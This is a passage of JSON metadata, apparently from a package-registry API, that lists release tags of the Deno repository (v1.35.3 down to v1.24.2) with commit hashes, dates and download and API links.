ttps://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/